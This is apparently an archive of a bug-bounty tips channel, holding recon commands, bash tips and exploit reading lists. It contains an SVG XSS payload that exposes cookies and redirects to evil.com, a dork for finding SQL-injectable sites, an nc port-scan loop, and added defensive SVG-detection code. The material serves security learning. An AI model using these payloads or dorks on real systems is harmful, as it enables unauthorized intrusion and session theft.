Bug bounty Tips

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

5 839 subscribers
Post archive
Effective way to crawl juicy endpoints with Katana happy hunting :)
katana -u vulnweb.com -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl -jc -xhr -kf -fx -fs dn -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg

Today i got xss on my private program

Google Dork to find SQLi union-based injection: inurl:"index.php?id=" intext:"Warning: mysql_num_rows()"

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("You have been hacked !! " + "\n" + "Domain: " + document.domain + "\n" + "Cookie: " + document.cookie );
window.location.href="https://evil.com"
</script>
</svg>
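The SVG above carries its payload in an inline script element and a window.location redirect. As an added example (not code from the channel), the following bash function is a triage check an upload handler or a log reviewer can run over an SVG file: it flags those two carriers plus the other common ones, on* event-handler attributes and javascript: URLs. The function and sample names are my own; the first sample is a copy of the payload quoted in the post, the second is a constructed benign file.

```shell
#!/bin/bash
# Added example (not from the channel post): quick triage check for uploaded
# SVG files. It is a grep heuristic, not a sanitizer: entity-encoded markup can
# slip past it, so user-supplied SVGs should still be served under a strict
# Content-Security-Policy or as Content-Disposition: attachment.

# Read an SVG on stdin, print one finding per line, return 1 if anything matched.
svg_active_content() {
    local body found=0
    # Drop control characters (joins lines, defeats "java<TAB>script:" tricks) and fold case.
    body=$(tr -d '\000-\037' | tr 'A-Z' 'a-z')
    printf '%s\n' "$body" | grep -q '<script' \
        && { echo "script element"; found=1; }
    printf '%s\n' "$body" | grep -Eq '<[^>]*[[:space:]]on[a-z]+[[:space:]]*=' \
        && { echo "event handler attribute"; found=1; }
    printf '%s\n' "$body" | grep -Eq "href[[:space:]]*=[[:space:]]*[\"']?[[:space:]]*javascript:" \
        && { echo "javascript: url"; found=1; }
    printf '%s\n' "$body" | grep -q 'window.location' \
        && { echo "window.location redirect"; found=1; }
    return "$found"
}

# Constructed sample: a copy of the payload quoted in the post above.
sample_payload_svg() {
    cat <<'EOF'
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("You have been hacked !! " + "\n" + "Domain: " + document.domain + "\n" + "Cookie: " + document.cookie );
window.location.href="https://evil.com"
</script>
</svg>
EOF
}

# Constructed sample: a benign SVG that should produce no findings.
sample_clean_svg() {
    cat <<'EOF'
<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10" fill="blue"/></svg>
EOF
}

# Usage in an upload hook:  svg_active_content < upload.svg || echo "rejected"
```

Control characters are stripped before matching because browsers ignore them inside a URL scheme, so a pattern that looked for the literal string javascript: would miss a tab-split variant; the whole body is also folded to lower case for the same reason.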

Simple Bash Scripting Cheatsheet
--------------------------------

[+] nano Shortcuts
ctrl v    Next page.
ctrl y    Previous page.
ctrl w    Where is (find).
ctrl k    Cut that line of text.
ctrl x    Exit editor.

[+] Create a text file:
touch file        Creates an empty file.
ifconfig > tmp    Pipe the output of a command.
nano file

[+] Create a file and append text to it:
ifconfig > tmp
echo >> tmp
ping google.com -c3 >> tmp

[+] How to view a file:
cat file         Show entire contents of file.
more file        Show one page at a time. Space bar for next page and (q) to exit.
head file        Show the first 10 lines.
head -15 file    Show the first 15 lines.
tail file        Show the last 10 lines.
tail -15 file    Show the last 15 lines.
tail -f file     Useful when viewing the output of a log file.

[+] pipe
cat tmp | grep Bcast    Feeds the output of one process to the input of another process.

[+] Processes
ps aux         Show all running processes for all users.
kill -9 PID    Nicely kill a PID.

[+] Word Count
wc -l tmp2    Count the number of lines in a file.

[+] cut -d delimiter -f fields

[+] sort
sort -u file                                            Sort by unique.
sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n               Sort IP addresses correctly.
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u    Isolate the IP address.

[+] awk
awk '{print $1}' file       Show the 1st column.
awk '{print $1,$5}' file    Show the 1st and 5th columns.

[+] grep
grep -v    Remove a single string.
grep -v 'red' file

[+] egrep -v
Remove multiple strings:
egrep -v '(red|white|blue)' file

[+] sed
sed 's/FOO/BAR/g' file    Replace FOO with BAR.
sed 's/FOO//g' file       Replace FOO with nothing.
sed '/^FOO/d' file        Remove lines that start with FOO.

[+] colour
31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan
echo -e "\e[1;34mThis is a blue text.\e[0m"

Bash Scripts
------------

[+] Simple bash script:
#!/bin/bash
clear
echo
echo "Hello world."

[+] Make a file executable.
chmod +x file
chmod 755 file

[+] Variables
name=Bob
echo $name
user=$(whoami)
echo $user
echo 'Hello' $name. 'You are running as' $user.

#!/bin/bash
clear
echo "Hello World"
name=Bob
ip=`ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1`
echo "Hello" $name "Your IP address is:" $ip

[+] User Input
read -p "Domain: " domain

#!/bin/bash
echo "Please input your domain:"
read -p "Domain:" domain
ping -c 5 $domain

[+] Check For No User Input
# Quote the variable so the test still works when it is empty.
if [ -z "$domain" ]; then
    echo
    echo "#########################"
    echo
    echo "Invalid choice."
    echo
    exit
fi

[+] For loops
#!/bin/bash
for host in $(cat hosts.txt)
do
    command $host
done

[+] One Liners
Port Scan:
for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done
Use a bash loop to find the IP address behind each host:
for url in $(cat list.txt); do host $url; done

[+] Condition One-liner
any command && if work || if not work
type -p massdns && massdns -r resolver.txt -t A -o S sub.txt -w sub.mass || echo "MassDns not installed"

[+] Condition One-liner with multiple actions
# A brace group needs a ";" before the closing "}".
any command && { if work; also this; also this; } || { if not work; also this; also this; }
type -p massdns && { massdns -r resolver.txt -t A -o S sub.txt -w sub.mass; cat sub.mass; } || { echo "MassDns not installed"; echo "Install MassDns"; }
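As an added example (not part of the channel's cheatsheet), this script combines the patterns above (a check for empty input, a loop over a hosts file, and the &&/|| conditional form) into one file that validates a host list before any of the one-liners run over it. It replaces `for host in $(cat hosts.txt)`, which word-splits on every space and glob-expands entries, with a `while read -r` loop, and quotes every expansion. The function names and the sample file contents are my own.

```shell
#!/bin/bash
# Added example, not from the channel's cheatsheet: validate a host list before
# feeding it to the recon one-liners, using the patterns the cheatsheet shows.

# Return 0 if the argument looks like a hostname or dotted-quad IPv4, else 1.
# This is the "check for no user input" test plus a character whitelist.
is_valid_host() {
    local h="$1"
    [ -n "$h" ] || return 1                 # empty input is rejected
    case "$h" in
        *[!A-Za-z0-9.-]*) return 1 ;;       # anything outside hostname characters
    esac
    return 0
}

# Count the lines of a file that pass is_valid_host; bad entries go to stderr.
# Uses while/read instead of for/$(cat ...) so entries with spaces stay intact.
count_valid_hosts() {
    local file="$1" n=0 line
    [ -r "$file" ] || { echo "cannot read $file" >&2; return 2; }
    while IFS= read -r line || [ -n "$line" ]; do
        is_valid_host "$line" && n=$((n + 1)) || echo "skipping bad entry: $line" >&2
    done < "$file"
    echo "$n"
}

# Constructed sample input (placeholder names, not real targets), written to a
# temp file whose path is printed so the caller can clean it up.
make_sample_hosts() {
    local f
    f=$(mktemp)
    printf '%s\n' 'example.com' '192.168.0.1' 'bad host name' '' 'sub.example.org' > "$f"
    echo "$f"
}

# Usage:  hosts=$(make_sample_hosts); count_valid_hosts "$hosts"; rm -f "$hosts"
```

The `||` branches in `count_valid_hosts` are the cheatsheet's "condition one-liner" form; because `&&` and `||` have equal precedence, `A && B || C` runs C whenever either A or B fails, which is harmless here since `n=$((n + 1))` cannot fail.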

🚨 Source Code Review 🚨 Functionality Type - Product Review Section • 🛒 A shopping site lets users leave reviews on products. Reviews are displayed on the product page. Identify Vulnerabilities in this code. How would you exploit it? Post Your Answers here : https://x.com/RadhaSec/status/1792625547740135741

How was your day guys😊

#WebApp_Security
1. FlowMate - BurpSuite extension that brings taint analysis to web apps https://github.com/usdAG/FlowMate
2. Stealing your Telegram account in 10 seconds flat https://lyra.horse/blog/2024/05/stealing-your-telegram-account-in-10-seconds-flat

#exploit
1. CVE-2024-27322: Vulnerability in R's Deserialization (R-Bitrary Code Execution) https://hiddenlayer.com/research/r-bitrary-code-execution
2. Minecraft "Randar" exploit https://github.com/spawnmason/randar-explanation
3. CVE-2024-26131, CVE-2024-26132: Element Android Exploit https://www.shielder.com/blog/2024/04/element-android-cve-2024-26131-cve-2024-26132-never-take-intents-from-strangers

#exploit
1. Telegram Web app XSS/Session Hijacking 1-click https://seclists.org/oss-sec/2024/q2/183
2. CVE-2019-2703: VirtualBox VM Escape https://j0nathanj.github.io/Dusting-off-the-VM-Escape
3. CVE-2024-26218: Windows PspBuildCreateProcessContext Double-Fetch / Buffer Overflow https://packetstormsecurity.com/files/178377/Windows-PspBuildCreateProcessContext-Double-Fetch-Buffer-Overflow.html

#Offensive_security
1. Relaying Kerberos Authentication from DCOM OXID Resolving https://www.tiraniddo.dev/2024/04/relaying-kerberos-authentication-from.html
2. Misconfig Mapper CLI Tool https://github.com/intigriti/misconfig-mapper

Apple Silicon Hardware Secrets: SPRR and Guarded Exception Levels (GXF) https://blog.svenpeter.dev/posts/m1_sprr_gxf

#Blue_Team_Techniques
1. Analysis of HSTS Caches of Different Browsers -> Forensic HSTS Analyzer: https://github.com/ernw/forensic-hsts-analyzer
2. Detecting memory management bugs with GCC 11. Part 1 - Understanding dynamic allocation https://developers.redhat.com/blog/2021/04/30/detecting-memory-management-bugs-with-gcc-11-part-1-understanding-dynamic-allocation